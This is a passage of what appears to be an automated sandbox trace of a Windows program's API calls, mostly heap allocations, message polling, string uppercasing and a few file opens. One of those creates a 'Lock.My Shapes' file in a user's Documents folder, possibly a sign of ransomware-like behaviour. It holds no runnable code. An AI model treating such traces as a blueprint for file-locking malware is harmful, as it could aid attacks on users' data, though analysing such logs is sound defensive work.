dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0264.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.772] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0264.773] GetLastError () returned 0x5 [0264.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0264.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.my shapes"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0264.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0264.775] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.775] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.775] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.775] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.776] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.776] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.776] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.776] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0264.776] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.777] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0264.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.778] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0264.778] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.778] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0264.778] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.778] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0264.778] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.778] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.779] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.779] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.779] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.779] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.779] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.779] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.780] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.780] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.780] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.780] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.780] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.780] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 